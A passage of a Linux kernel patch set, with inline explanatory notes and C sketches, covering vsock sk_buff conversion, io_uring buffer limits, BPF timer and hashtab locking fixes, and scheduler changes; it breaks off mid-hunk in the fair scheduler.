+diff --git a/include/linux/virtio_vsock.h b/include/linux/virtio_vsock.h
+index 35d7eedb5e8e4..3f9c166113063 100644
+--- a/include/linux/virtio_vsock.h
++++ b/include/linux/virtio_vsock.h
+@@ -7,6 +7,109 @@
+ #include <net/sock.h>
+ #include <net/af_vsock.h>
+ 
++#define VIRTIO_VSOCK_SKB_HEADROOM (sizeof(struct virtio_vsock_hdr))
++
++struct virtio_vsock_skb_cb {
++	bool reply;
++	bool tap_delivered;
++};
++
++#define VIRTIO_VSOCK_SKB_CB(skb) ((struct virtio_vsock_skb_cb *)((skb)->cb))
++
++static inline struct virtio_vsock_hdr *virtio_vsock_hdr(struct sk_buff *skb)
++{
++	return (struct virtio_vsock_hdr *)skb->head;
++}
++
++static inline bool virtio_vsock_skb_reply(struct sk_buff *skb)
++{
++	return VIRTIO_VSOCK_SKB_CB(skb)->reply;
++}
++
++static inline void virtio_vsock_skb_set_reply(struct sk_buff *skb)
++{
++	VIRTIO_VSOCK_SKB_CB(skb)->reply = true;
++}
++
++static inline bool virtio_vsock_skb_tap_delivered(struct sk_buff *skb)
++{
++	return VIRTIO_VSOCK_SKB_CB(skb)->tap_delivered;
++}
++
++static inline void virtio_vsock_skb_set_tap_delivered(struct sk_buff *skb)
++{
++	VIRTIO_VSOCK_SKB_CB(skb)->tap_delivered = true;
++}
++
++static inline void virtio_vsock_skb_clear_tap_delivered(struct sk_buff *skb)
++{
++	VIRTIO_VSOCK_SKB_CB(skb)->tap_delivered = false;
++}
++
++static inline void virtio_vsock_skb_rx_put(struct sk_buff *skb)
++{
++	u32 len;
++
++	len = le32_to_cpu(virtio_vsock_hdr(skb)->len);
++
++	if (len > 0)
++		skb_put(skb, len);
++}
++
++static inline struct sk_buff *virtio_vsock_alloc_skb(unsigned int size, gfp_t mask)
++{
++	struct sk_buff *skb;
++
++	if (size < VIRTIO_VSOCK_SKB_HEADROOM)
++		return NULL;
++
++	skb = alloc_skb(size, mask);
++	if (!skb)
++		return NULL;
++
++	skb_reserve(skb, VIRTIO_VSOCK_SKB_HEADROOM);
++	return skb;
++}
++
++static inline void
++virtio_vsock_skb_queue_head(struct sk_buff_head *list, struct sk_buff *skb)
++{
++	spin_lock_bh(&list->lock);
++	__skb_queue_head(list, skb);
++	spin_unlock_bh(&list->lock);
++}
++
++static inline void
++virtio_vsock_skb_queue_tail(struct sk_buff_head *list, struct sk_buff *skb)
++{
++	spin_lock_bh(&list->lock);
++	__skb_queue_tail(list, skb);
++	spin_unlock_bh(&list->lock);
++}
++
++static inline struct sk_buff *virtio_vsock_skb_dequeue(struct sk_buff_head *list)
++{
++	struct sk_buff *skb;
++
++	spin_lock_bh(&list->lock);
++	skb = __skb_dequeue(list);
++	spin_unlock_bh(&list->lock);
++
++	return skb;
++}
++
++static inline void virtio_vsock_skb_queue_purge(struct sk_buff_head *list)
++{
++	spin_lock_bh(&list->lock);
++	__skb_queue_purge(list);
++	spin_unlock_bh(&list->lock);
++}
++
++static inline size_t virtio_vsock_skb_len(struct sk_buff *skb)
++{
++	return (size_t)(skb_end_pointer(skb) - skb->head);
++}
++
+ #define VIRTIO_VSOCK_DEFAULT_RX_BUF_SIZE	(1024 * 4)
+ #define VIRTIO_VSOCK_MAX_BUF_SIZE		0xFFFFFFFFUL
+ #define VIRTIO_VSOCK_MAX_PKT_BUF_SIZE		(1024 * 64)
+@@ -35,23 +138,10 @@ struct virtio_vsock_sock {
+ 	u32 last_fwd_cnt;
+ 	u32 rx_bytes;
+ 	u32 buf_alloc;
+-	struct list_head rx_queue;
++	struct sk_buff_head rx_queue;
+ 	u32 msg_count;
+ };
+ 
+-struct virtio_vsock_pkt {
+-	struct virtio_vsock_hdr	hdr;
+-	struct list_head list;
+-	/* socket refcnt not held, only use for cancellation */
+-	struct vsock_sock *vsk;
+-	void *buf;
+-	u32 buf_len;
+-	u32 len;
+-	u32 off;
+-	bool reply;
+-	bool tap_delivered;
+-};
+-
+ struct virtio_vsock_pkt_info {
+ 	u32 remote_cid, remote_port;
+ 	struct vsock_sock *vsk;
+@@ -68,7 +158,7 @@ struct virtio_transport {
+ 	struct vsock_transport transport;
+ 
+ 	/* Takes ownership of the packet */
+-	int (*send_pkt)(struct virtio_vsock_pkt *pkt);
++	int (*send_pkt)(struct sk_buff *skb);
+ };
+ 
+ ssize_t
+@@ -149,11 +239,10 @@ virtio_transport_dgram_enqueue(struct vsock_sock *vsk,
+ void virtio_transport_destruct(struct vsock_sock *vsk);
+ 
+ void virtio_transport_recv_pkt(struct virtio_transport *t,
+-			       struct virtio_vsock_pkt *pkt);
+-void virtio_transport_free_pkt(struct virtio_vsock_pkt *pkt);
+-void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct virtio_vsock_pkt *pkt);
++			       struct sk_buff *skb);
++void virtio_transport_inc_tx_pkt(struct virtio_vsock_sock *vvs, struct sk_buff *skb);
+ u32 virtio_transport_get_credit(struct virtio_vsock_sock *vvs, u32 wanted);
+ void virtio_transport_put_credit(struct virtio_vsock_sock *vvs, u32 credit);
+-void virtio_transport_deliver_tap_pkt(struct virtio_vsock_pkt *pkt);
+-
++void virtio_transport_deliver_tap_pkt(struct sk_buff *skb);
++int virtio_transport_purge_skbs(void *vsk, struct sk_buff_head *list);
+ #endif /* _LINUX_VIRTIO_VSOCK_H */
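
Taken together, the helpers above move packet state into skb->cb and the virtio header into reserved headroom, with BH-safe queueing around a plain sk_buff_head. A hedged kernel-context sketch of the pattern (illustrative only, not buildable outside a kernel tree; example_queue_pkt is a made-up name):

/*
 * Allocate an skb with header room, fill the virtio header sitting at
 * skb->head, then queue it with the BH-safe helper.
 */
static int example_queue_pkt(struct sk_buff_head *q, u32 dst_cid)
{
	struct virtio_vsock_hdr *hdr;
	struct sk_buff *skb;

	skb = virtio_vsock_alloc_skb(VIRTIO_VSOCK_SKB_HEADROOM, GFP_KERNEL);
	if (!skb)
		return -ENOMEM;

	hdr = virtio_vsock_hdr(skb);		/* header lives in the headroom */
	hdr->dst_cid = cpu_to_le64(dst_cid);
	hdr->len = cpu_to_le32(0);		/* control packet, no payload */

	virtio_vsock_skb_queue_tail(q, skb);	/* takes list->lock with _bh */
	return 0;
}
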
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index 7a6c3059d50b5..5bf5c1ab542ce 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -5690,6 +5690,16 @@ void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work);
+  */
+ void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work);
+ 
++/**
++ * wiphy_work_flush - flush previously queued work
++ * @wiphy: the wiphy, for debug purposes
++ * @work: the work to flush, this can be %NULL to flush all work
++ *
++ * Flush the work (i.e. run it if pending). This must be called
++ * under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_work_flush(struct wiphy *wiphy, struct wiphy_work *work);
++
+ struct wiphy_delayed_work {
+ 	struct wiphy_work work;
+ 	struct wiphy *wiphy;
+@@ -5733,6 +5743,17 @@ void wiphy_delayed_work_queue(struct wiphy *wiphy,
+ void wiphy_delayed_work_cancel(struct wiphy *wiphy,
+ 			       struct wiphy_delayed_work *dwork);
+ 
++/**
++ * wiphy_delayed_work_flush - flush previously queued delayed work
++ * @wiphy: the wiphy, for debug purposes
++ * @work: the work to flush
++ *
++ * Flush the work (i.e. run it if pending). This must be called
++ * under the wiphy mutex acquired by wiphy_lock().
++ */
++void wiphy_delayed_work_flush(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork);
++
+ /**
+  * struct wireless_dev - wireless device state
+  *
+diff --git a/include/net/flow.h b/include/net/flow.h
+index 2f0da4f0318b5..079cc493fe67d 100644
+--- a/include/net/flow.h
++++ b/include/net/flow.h
+@@ -39,8 +39,8 @@ struct flowi_common {
+ #define FLOWI_FLAG_KNOWN_NH		0x02
+ 	__u32	flowic_secid;
+ 	kuid_t  flowic_uid;
+-	struct flowi_tunnel flowic_tun_key;
+ 	__u32		flowic_multipath_hash;
++	struct flowi_tunnel flowic_tun_key;
+ };
+ 
+ union flowi_uli {
+diff --git a/include/net/netfilter/nf_nat_redirect.h b/include/net/netfilter/nf_nat_redirect.h
+index 2418653a66db1..279380de904c8 100644
+--- a/include/net/netfilter/nf_nat_redirect.h
++++ b/include/net/netfilter/nf_nat_redirect.h
+@@ -6,8 +6,7 @@
+ #include <uapi/linux/netfilter/nf_nat.h>
+ 
+ unsigned int
+-nf_nat_redirect_ipv4(struct sk_buff *skb,
+-		     const struct nf_nat_ipv4_multi_range_compat *mr,
++nf_nat_redirect_ipv4(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 		     unsigned int hooknum);
+ unsigned int
+ nf_nat_redirect_ipv6(struct sk_buff *skb, const struct nf_nat_range2 *range,
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 548c75c8a34c7..19646fdec23dc 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -810,7 +810,7 @@ static inline u32 tcp_time_stamp(const struct tcp_sock *tp)
+ }
+ 
+ /* Convert a nsec timestamp into TCP TSval timestamp (ms based currently) */
+-static inline u32 tcp_ns_to_ts(u64 ns)
++static inline u64 tcp_ns_to_ts(u64 ns)
+ {
+ 	return div_u64(ns, NSEC_PER_SEC / TCP_TS_HZ);
+ }
+diff --git a/include/uapi/linux/psp-sev.h b/include/uapi/linux/psp-sev.h
+index 91b4c63d5cbf4..1c9da485318f9 100644
+--- a/include/uapi/linux/psp-sev.h
++++ b/include/uapi/linux/psp-sev.h
+@@ -36,6 +36,13 @@ enum {
+  * SEV Firmware status code
+  */
+ typedef enum {
++	/*
++	 * This error code is not in the SEV spec. Its purpose is to convey that
++	 * there was an error that prevented the SEV firmware from being called.
++	 * The SEV API error codes are 16 bits, so the -1 value will not overlap
++	 * with possible values from the specification.
++	 */
++	SEV_RET_NO_FW_CALL = -1,
+ 	SEV_RET_SUCCESS = 0,
+ 	SEV_RET_INVALID_PLATFORM_STATE,
+ 	SEV_RET_INVALID_GUEST_STATE,
+diff --git a/include/uapi/linux/sev-guest.h b/include/uapi/linux/sev-guest.h
+index 256aaeff7e654..2aa39112cf8dd 100644
+--- a/include/uapi/linux/sev-guest.h
++++ b/include/uapi/linux/sev-guest.h
+@@ -52,8 +52,14 @@ struct snp_guest_request_ioctl {
+ 	__u64 req_data;
+ 	__u64 resp_data;
+ 
+-	/* firmware error code on failure (see psp-sev.h) */
+-	__u64 fw_err;
++	/* bits[63:32]: VMM error code, bits[31:0] firmware error code (see psp-sev.h) */
++	union {
++		__u64 exitinfo2;
++		struct {
++			__u32 fw_error;
++			__u32 vmm_error;
++		};
++	};
+ };
+ 
+ struct snp_ext_report_req {
+@@ -77,4 +83,12 @@ struct snp_ext_report_req {
+ /* Get SNP extended report as defined in the GHCB specification version 2. */
+ #define SNP_GET_EXT_REPORT _IOWR(SNP_GUEST_REQ_IOC_TYPE, 0x2, struct snp_guest_request_ioctl)
+ 
++/* Guest message request EXIT_INFO_2 constants */
++#define SNP_GUEST_FW_ERR_MASK		GENMASK_ULL(31, 0)
++#define SNP_GUEST_VMM_ERR_SHIFT		32
++#define SNP_GUEST_VMM_ERR(x)		(((u64)x) << SNP_GUEST_VMM_ERR_SHIFT)
++
++#define SNP_GUEST_VMM_ERR_INVALID_LEN	1
++#define SNP_GUEST_VMM_ERR_BUSY		2
++
+ #endif /* __UAPI_LINUX_SEV_GUEST_H_ */
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index acc37e5a6d4e1..57ef6850c6a87 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -19,12 +19,15 @@
+ 
+ #define BGID_ARRAY	64
+ 
++/* BIDs are addressed by a 16-bit field in a CQE */
++#define MAX_BIDS_PER_BGID (1 << 16)
++
+ struct io_provide_buf {
+ 	struct file			*file;
+ 	__u64				addr;
+ 	__u32				len;
+ 	__u32				bgid;
+-	__u16				nbufs;
++	__u32				nbufs;
+ 	__u16				bid;
+ };
+ 
+@@ -281,7 +284,7 @@ int io_remove_buffers_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 		return -EINVAL;
+ 
+ 	tmp = READ_ONCE(sqe->fd);
+-	if (!tmp || tmp > USHRT_MAX)
++	if (!tmp || tmp > MAX_BIDS_PER_BGID)
+ 		return -EINVAL;
+ 
+ 	memset(p, 0, sizeof(*p));
+@@ -327,7 +330,7 @@ int io_provide_buffers_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe
+ 		return -EINVAL;
+ 
+ 	tmp = READ_ONCE(sqe->fd);
+-	if (!tmp || tmp > USHRT_MAX)
++	if (!tmp || tmp > MAX_BIDS_PER_BGID)
+ 		return -E2BIG;
+ 	p->nbufs = tmp;
+ 	p->addr = READ_ONCE(sqe->addr);
+@@ -347,7 +350,7 @@ int io_provide_buffers_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe
+ 	tmp = READ_ONCE(sqe->off);
+ 	if (tmp > USHRT_MAX)
+ 		return -E2BIG;
+-	if (tmp + p->nbufs >= USHRT_MAX)
++	if (tmp + p->nbufs > MAX_BIDS_PER_BGID)
+ 		return -EINVAL;
+ 	p->bid = tmp;
+ 	return 0;
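+
The BID bound above is easiest to verify with concrete numbers: buffer IDs occupy a 16-bit CQE field, so a group starting at bid with nbufs buffers is legal exactly when its last ID, bid + nbufs - 1, is at most 65535. A minimal standalone C sketch of the corrected check (MAX_BIDS_PER_BGID and the comparison mirror the hunk above; the function name is illustrative):

#include <stdbool.h>
#include <stdint.h>

#define MAX_BIDS_PER_BGID (1 << 16)

/* Valid iff every BID in [bid, bid + nbufs - 1] fits in 16 bits. */
static bool bid_range_valid(uint32_t bid, uint32_t nbufs)
{
	return nbufs && bid + nbufs <= MAX_BIDS_PER_BGID;
}

/* Example: bid = 0, nbufs = 65535 uses BIDs 0..65534. The old
 * "tmp + p->nbufs >= USHRT_MAX" test rejected it; the new bound
 * (65535 <= 65536) correctly accepts it. */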
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 9fe1aada3ad00..57c626cb4d1a5 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1433,16 +1433,6 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 	int ret;
+ 	bool force_nonblock = issue_flags & IO_URING_F_NONBLOCK;
+ 
+-	if (connect->in_progress) {
+-		struct socket *socket;
+-
+-		ret = -ENOTSOCK;
+-		socket = sock_from_file(req->file);
+-		if (socket)
+-			ret = sock_error(socket->sk);
+-		goto out;
+-	}
+-
+ 	if (req_has_async_data(req)) {
+ 		io = req->async_data;
+ 	} else {
+@@ -1462,9 +1452,7 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 	    && force_nonblock) {
+ 		if (ret == -EINPROGRESS) {
+ 			connect->in_progress = true;
+-			return -EAGAIN;
+-		}
+-		if (ret == -ECONNABORTED) {
++		} else if (ret == -ECONNABORTED) {
+ 			if (connect->seen_econnaborted)
+ 				goto out;
+ 			connect->seen_econnaborted = true;
+@@ -1478,6 +1466,16 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 		memcpy(req->async_data, &__io, sizeof(__io));
+ 		return -EAGAIN;
+ 	}
++	if (connect->in_progress) {
++		/*
++		 * At least bluetooth will return -EBADFD on a re-connect
++		 * attempt, and it's (supposedly) also valid to get -EISCONN
++		 * which means the previous result is good. For both of these,
++		 * grab the sock_error() and use that for the completion.
++		 */
++		if (ret == -EBADFD || ret == -EISCONN)
++			ret = sock_error(sock_from_file(req->file)->sk);
++	}
+ 	if (ret == -ERESTARTSYS)
+ 		ret = -EINTR;
+ out:
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index e4e7f343346f9..ce0051eee746e 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -155,13 +155,15 @@ static inline int htab_lock_bucket(const struct bpf_htab *htab,
+ 	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+ 
+ 	preempt_disable();
++	local_irq_save(flags);
+ 	if (unlikely(__this_cpu_inc_return(*(htab->map_locked[hash])) != 1)) {
+ 		__this_cpu_dec(*(htab->map_locked[hash]));
++		local_irq_restore(flags);
+ 		preempt_enable();
+ 		return -EBUSY;
+ 	}
+ 
+-	raw_spin_lock_irqsave(&b->raw_lock, flags);
++	raw_spin_lock(&b->raw_lock);
+ 	*pflags = flags;
+ 
+ 	return 0;
+@@ -172,8 +174,9 @@ static inline void htab_unlock_bucket(const struct bpf_htab *htab,
+ 				      unsigned long flags)
+ {
+ 	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+-	raw_spin_unlock_irqrestore(&b->raw_lock, flags);
++	raw_spin_unlock(&b->raw_lock);
+ 	__this_cpu_dec(*(htab->map_locked[hash]));
++	local_irq_restore(flags);
+ 	preempt_enable();
+ }
+ 
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index a6b04faed282b..6212e4ae084bb 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -1156,13 +1156,6 @@ BPF_CALL_3(bpf_timer_init, struct bpf_timer_kern *, timer, struct bpf_map *, map
+ 		ret = -EBUSY;
+ 		goto out;
+ 	}
+-	if (!atomic64_read(&map->usercnt)) {
+-		/* maps with timers must be either held by user space
+-		 * or pinned in bpffs.
+-		 */
+-		ret = -EPERM;
+-		goto out;
+-	}
+ 	/* allocate hrtimer via map_kmalloc to use memcg accounting */
+ 	t = bpf_map_kmalloc_node(map, sizeof(*t), GFP_ATOMIC, map->numa_node);
+ 	if (!t) {
+@@ -1175,7 +1168,21 @@ BPF_CALL_3(bpf_timer_init, struct bpf_timer_kern *, timer, struct bpf_map *, map
+ 	rcu_assign_pointer(t->callback_fn, NULL);
+ 	hrtimer_init(&t->timer, clockid, HRTIMER_MODE_REL_SOFT);
+ 	t->timer.function = bpf_timer_cb;
+-	timer->timer = t;
++	WRITE_ONCE(timer->timer, t);
++	/* Guarantee the order between timer->timer and map->usercnt. So
++	 * when there are concurrent uref release and bpf timer init, either
++	 * bpf_timer_cancel_and_free() called by uref release reads a non-NULL
++	 * timer or atomic64_read() below returns a zero usercnt.
++	 */
++	smp_mb();
++	if (!atomic64_read(&map->usercnt)) {
++		/* maps with timers must be either held by user space
++		 * or pinned in bpffs.
++		 */
++		WRITE_ONCE(timer->timer, NULL);
++		kfree(t);
++		ret = -EPERM;
++	}
+ out:
+ 	__bpf_spin_unlock_irqrestore(&timer->lock);
+ 	return ret;
+@@ -1343,7 +1350,7 @@ void bpf_timer_cancel_and_free(void *val)
+ 	/* The subsequent bpf_timer_start/cancel() helpers won't be able to use
+ 	 * this timer, since it won't be initialized.
+ 	 */
+-	timer->timer = NULL;
++	WRITE_ONCE(timer->timer, NULL);
+ out:
+ 	__bpf_spin_unlock_irqrestore(&timer->lock);
+ 	if (!t)
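+
The smp_mb() in the hunk above implements a publish-then-check pattern: the init path stores the timer pointer and only then samples usercnt, while the uref-release path drops usercnt and only then reads the pointer; with a full barrier on each side, at least one side must observe the other's write, so the timer can never outlive the map unnoticed. A userspace C11 sketch of the same shape (all names and the allocation size are illustrative, not kernel code):

#include <stdatomic.h>
#include <stdlib.h>

static _Atomic(void *) timer;
static atomic_long usercnt = 1;

static int timer_init(void)
{
	void *t = malloc(64);

	if (!t)
		return -1;
	atomic_store_explicit(&timer, t, memory_order_relaxed);
	atomic_thread_fence(memory_order_seq_cst);	/* the smp_mb() */
	if (atomic_load_explicit(&usercnt, memory_order_relaxed) == 0) {
		/* map already released: undo the publish */
		atomic_store_explicit(&timer, NULL, memory_order_relaxed);
		free(t);
		return -1;	/* -EPERM in the kernel */
	}
	return 0;
}

static void uref_release(void)
{
	atomic_fetch_sub_explicit(&usercnt, 1, memory_order_relaxed);
	atomic_thread_fence(memory_order_seq_cst);	/* pairs with the fence above */
	free(atomic_exchange_explicit(&timer, NULL, memory_order_relaxed));
}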
+diff --git a/kernel/futex/core.c b/kernel/futex/core.c
+index 514e4582b8634..d4141b0547187 100644
+--- a/kernel/futex/core.c
++++ b/kernel/futex/core.c
+@@ -248,7 +248,17 @@ int get_futex_key(u32 __user *uaddr, bool fshared, union futex_key *key,
+ 	 *        but access_ok() should be faster than find_vma()
+ 	 */
+ 	if (!fshared) {
+-		key->private.mm = mm;
++		/*
++		 * On no-MMU, shared futexes are treated as private, therefore
++		 * we must not include the current process in the key. Since
++		 * there is only one address space, the address is a unique key
++		 * on its own.
++		 */
++		if (IS_ENABLED(CONFIG_MMU))
++			key->private.mm = mm;
++		else
++			key->private.mm = NULL;
++
+ 		key->private.address = address;
+ 		return 0;
+ 	}
+diff --git a/kernel/irq/matrix.c b/kernel/irq/matrix.c
+index 1698e77645acf..75d0ae490e29c 100644
+--- a/kernel/irq/matrix.c
++++ b/kernel/irq/matrix.c
+@@ -466,16 +466,16 @@ unsigned int irq_matrix_reserved(struct irq_matrix *m)
+ }
+ 
+ /**
+- * irq_matrix_allocated - Get the number of allocated irqs on the local cpu
++ * irq_matrix_allocated - Get the number of allocated non-managed irqs on the local CPU
+  * @m:		Pointer to the matrix to search
+  *
+- * This returns number of allocated irqs
++ * This returns number of allocated non-managed interrupts.
+  */
+ unsigned int irq_matrix_allocated(struct irq_matrix *m)
+ {
+ 	struct cpumap *cm = this_cpu_ptr(m->maps);
+ 
+-	return cm->allocated;
++	return cm->allocated - cm->managed_allocated;
+ }
+ 
+ #ifdef CONFIG_GENERIC_IRQ_DEBUGFS
+diff --git a/kernel/livepatch/core.c b/kernel/livepatch/core.c
+index 9ada0bc5247be..0e651fd4cc9fc 100644
+--- a/kernel/livepatch/core.c
++++ b/kernel/livepatch/core.c
+@@ -244,7 +244,7 @@ static int klp_resolve_symbols(Elf_Shdr *sechdrs, const char *strtab,
+ 		 * symbols are exported and normal relas can be used instead.
+ 		 */
+ 		if (!sec_vmlinux && sym_vmlinux) {
+-			pr_err("invalid access to vmlinux symbol '%s' from module-specific livepatch relocation section",
++			pr_err("invalid access to vmlinux symbol '%s' from module-specific livepatch relocation section\n",
+ 			       sym_name);
+ 			return -EINVAL;
+ 		}
+diff --git a/kernel/module/decompress.c b/kernel/module/decompress.c
+index 720e719253cd1..e1e9f69c5dd16 100644
+--- a/kernel/module/decompress.c
++++ b/kernel/module/decompress.c
+@@ -100,7 +100,7 @@ static ssize_t module_gzip_decompress(struct load_info *info,
+ 	s.next_in = buf + gzip_hdr_len;
+ 	s.avail_in = size - gzip_hdr_len;
+ 
+-	s.workspace = kmalloc(zlib_inflate_workspacesize(), GFP_KERNEL);
++	s.workspace = vmalloc(zlib_inflate_workspacesize());
+ 	if (!s.workspace)
+ 		return -ENOMEM;
+ 
+@@ -138,7 +138,7 @@ static ssize_t module_gzip_decompress(struct load_info *info,
+ out_inflate_end:
+ 	zlib_inflateEnd(&s);
+ out:
+-	kfree(s.workspace);
++	vfree(s.workspace);
+ 	return retval;
+ }
+ #elif CONFIG_MODULE_COMPRESS_XZ
+diff --git a/kernel/padata.c b/kernel/padata.c
+index de90af5fcbe6b..791d9cb07a501 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -1094,12 +1094,16 @@ EXPORT_SYMBOL(padata_alloc_shell);
+  */
+ void padata_free_shell(struct padata_shell *ps)
+ {
++	struct parallel_data *pd;
++
+ 	if (!ps)
+ 		return;
+ 
+ 	mutex_lock(&ps->pinst->lock);
+ 	list_del(&ps->list);
+-	padata_free_pd(rcu_dereference_protected(ps->pd, 1));
++	pd = rcu_dereference_protected(ps->pd, 1);
++	if (refcount_dec_and_test(&pd->refcnt))
++		padata_free_pd(pd);
+ 	mutex_unlock(&ps->pinst->lock);
+ 
+ 	kfree(ps);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 55d13980e29fd..18a4f8f28a25f 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2463,9 +2463,11 @@ static int migration_cpu_stop(void *data)
+ 		 * it.
+ 		 */
+ 		WARN_ON_ONCE(!pending->stop_pending);
++		preempt_disable();
+ 		task_rq_unlock(rq, p, &rf);
+ 		stop_one_cpu_nowait(task_cpu(p), migration_cpu_stop,
+ 				    &pending->arg, &pending->stop_work);
++		preempt_enable();
+ 		return 0;
+ 	}
+ out:
+@@ -2746,12 +2748,13 @@ static int affine_move_task(struct rq *rq, struct task_struct *p, struct rq_flag
+ 			complete = true;
+ 		}
+ 
++		preempt_disable();
+ 		task_rq_unlock(rq, p, rf);
+-
+ 		if (push_task) {
+ 			stop_one_cpu_nowait(rq->cpu, push_cpu_stop,
+ 					    p, &rq->push_work);
+ 		}
++		preempt_enable();
+ 
+ 		if (complete)
+ 			complete_all(&pending->done);
+@@ -2817,12 +2820,13 @@ static int affine_move_task(struct rq *rq, struct task_struct *p, struct rq_flag
+ 		if (flags & SCA_MIGRATE_ENABLE)
+ 			p->migration_flags &= ~MDF_PUSH;
+ 
++		preempt_disable();
+ 		task_rq_unlock(rq, p, rf);
+-
+ 		if (!stop_pending) {
+ 			stop_one_cpu_nowait(cpu_of(rq), migration_cpu_stop,
+ 					    &pending->arg, &pending->stop_work);
+ 		}
++		preempt_enable();
+ 
+ 		if (flags & SCA_MIGRATE_ENABLE)
+ 			return 0;
+@@ -9255,9 +9259,11 @@ static void balance_push(struct rq *rq)
+ 	 * Temporarily drop rq->lock such that we can wake-up the stop task.
+ 	 * Both preemption and IRQs are still disabled.
+ 	 */
++	preempt_disable();
+ 	raw_spin_rq_unlock(rq);
+ 	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
+ 			    this_cpu_ptr(&push_work));
++	preempt_enable();
+ 	/*
+ 	 * At this point need_resched() is true and we'll take the loop in
+ 	 * schedule(). The next pick is obviously going to be the stop task
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index 9ce9810861ba5..389290e950bea 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -2460,9 +2460,11 @@ skip:
+ 		double_unlock_balance(this_rq, src_rq);
+ 
+ 		if (push_task) {
++			preempt_disable();
+ 			raw_spin_rq_unlock(this_rq);
+ 			stop_one_cpu_nowait(src_rq->cpu, push_cpu_stop,
+ 					    push_task, &src_rq->push_work);
++			preempt_enable();
+ 			raw_spin_rq_lock(this_rq);
+ 		}
+ 	}
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 612873ec2197f..2558ab9033bee 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4279,22 +4279,6 @@ static inline unsigned long task_util_est(struct task_struct *p)
+ 	return max(task_util(p), _task_util_est(p));
+ }
+ 
+-#ifdef CONFIG_UCLAMP_TASK
+-static inline unsigned long uclamp_task_util(struct task_struct *p,
+-					     unsigned long uclamp_min,
+-					     unsigned long uclamp_max)
+-{
+-	return clamp(task_util_est(p), uclamp_min, uclamp_max);
+-}
+-#else
+-static inline unsigned long uclamp_task_util(struct task_struct *p,
+-					     unsigned long uclamp_min,
+-					     unsigned long uclamp_max)
+-{
+-	return task_util_est(p);
+-}
+-#endif
+-
+ static inline void util_est_enqueue(struct cfs_rq *cfs_rq,
+ 				    struct task_struct *p)
+ {
+@@ -4585,7 +4569,7 @@ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
+ 
+ static inline bool cfs_rq_is_decayed(struct cfs_rq *cfs_rq)
+ {
+-	return true;
++	return !cfs_rq->nr_running;
+ }
+ 
+ #define UPDATE_TG	0x0
+@@ -7279,7 +7263,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	target = prev_cpu;
+ 
+ 	sync_entity_load_avg(&p->se);
+-	if (!uclamp_task_util(p, p_util_min, p_util_max))
++	if (!task_util_est(p) && p_util_min == 0)
+ 		goto unlock;
+ 
+ 	eenv_task_busy_time(&eenv, p, prev_cpu);
+@@ -7287,11 +7271,10 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	for (; pd; pd = pd->next) {
+ 		unsigned long util_min = p_util_min, util_max = p_util_max;
+ 		unsigned long cpu_cap, cpu_thermal_cap, util;
+-		unsigned long cur_delta, max_spare_cap = 0;
++		long prev_spare_cap = -1, max_spare_cap = -1;
+ 		unsigned long rq_util_min, rq_util_max;
+-		unsigned long prev_spare_cap = 0;
++		unsigned long cur_delta, base_energy;
+ 		int max_spare_cap_cpu = -1;
+-		unsigned long base_energy;
+ 		int fits, max_fits = -1;
+ 
+ 		cpumask_and(cpus, perf_domain_span(pd), cpu_online_mask);
+@@ -7354,7 +7337,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 				prev_spare_cap = cpu_cap;
+ 				prev_fits = fits;
+ 			} else if ((fits > max_fits) ||
+-				   ((fits == max_fits) && (cpu_cap > max_spare_cap))) {
++				   ((fits == max_fits) && ((long)cpu_cap > max_spare_cap))) {
+ 				/*
+ 				 * Find the CPU with the maximum spare capacity
+ 				 * among the remaining CPUs in the performance
+@@ -7366,7 +7349,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			}
+ 		}
+ 
+-		if (max_spare_cap_cpu < 0 && prev_spare_cap == 0)
++		if (max_spare_cap_cpu < 0 && prev_spare_cap < 0)
+ 			continue;
+ 
+ 		eenv_pd_busy_time(&eenv, cpus, p);
+@@ -7374,7 +7357,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		base_energy = compute_energy(&eenv, pd, cpus, p, -1);
+ 
+ 		/* Evaluate the energy impact of using prev_cpu. */
